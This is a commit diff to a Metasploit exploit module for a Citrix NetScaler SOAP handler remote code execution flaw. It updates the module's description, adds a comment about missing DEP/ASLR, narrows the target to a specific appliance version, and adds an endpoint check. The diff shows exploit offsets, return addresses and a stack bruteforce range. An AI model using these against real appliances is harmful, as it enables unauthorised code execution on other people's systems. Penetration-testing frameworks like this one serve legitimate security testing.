Update module information

2014-10-30 20:33:38 -05:00 · 2014-10-30 20:33:38 -05:00 · 9404e24b24
parent ac939325ce
commit 9404e24b24
1 changed files with 17 additions and 5 deletions
--- a/modules/exploits/freebsd/misc/citrix_netscaler_bof.rb
+++ b/modules/exploits/freebsd/misc/citrix_netscaler_bof.rb
@ -14,10 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote

  def initialize(info={})
    super(update_info(info,
-      'Name'           => "Citrix NetScaler Buffer Overflow",
+      'Name'           => "Citrix NetScaler SOAP Handler Remote Code Execution",
      'Description'    => %q{
-        This module exploits a buffer overflow vulnerability found in Citrix NetScaler...
-        The vulnerability exists.... This module has been tested successfully on....
+        This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
+        The vulnerability exists in the SOAP handler, accessible through the web interface. A
+        malicious SOAP requests can force the handler to connect to a malicious NetScaler config
+        server. This malicious config server can send a specially crafted response in order to
+        trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
+        code with the privileges of the web server running the SOAP handler. This module has been
+        tested successfully on the NetScaler Virtual Appliance 450010.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
@ -27,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
        ],
      'References'     =>
        [
-          ['URL', 'http://http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
+          ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
        ],
      'Payload'        =>
        {
@ -40,11 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
-          [ 'NetScaler Virtual Appliance',
+          [ 'NetScaler Virtual Appliance 450010',
            {
              'RwPtr'        => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
              'Offset'       => 606,
              'Ret'          => 0xffffda94, # Try before bruteforce...
+              # The virtual appliance lacks of security mitigations like DEP/ASLR, since the
+              # process being exploited is an apache child, the bruteforce attack works fine
+              # here.
              'Bruteforce'   =>
                {
                  'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
@ -84,6 +92,10 @@ class Metasploit3 < Msf::Exploit::Remote
      fail_with(Failure::BadConfig, 'Don\'t use 0.0.0.0 as SRVHOST, use an address on the local machine reachable by the target')
    end

+    if check != Exploit::CheckCode::Detected
+      fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
+    end
+
    start_service

    if target.ret